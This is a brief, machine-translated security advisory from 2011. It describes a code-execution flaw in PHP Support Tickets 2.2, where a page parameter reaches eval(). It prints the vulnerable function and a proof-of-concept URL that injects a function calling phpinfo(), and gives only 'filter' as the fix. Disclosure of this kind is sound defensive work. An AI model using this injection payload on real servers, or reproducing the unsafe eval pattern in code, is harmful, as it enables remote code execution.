PHP Support Tickets v2. 2 code implementation of defect and repair-vulnerability warning-the black bar safety net

2011-09-14T00:00:00
ID MYHACK58:62201131837
Type myhack58
Reporter 佚名
Modified 2011-09-14T00:00:00

Description

Title: PHP Support Tickets v2. 2 Code Exec

Author: brain[pillow] Developer website: www.phpsupporttickets.com Affected version: 2.2 Defect code analysis:

/classes/GUI/abstract.GUI.php

www.badguest.cn

public function getPageName() {

return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';');

}

==================================================================== Test:

/index. php? page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Fix: filter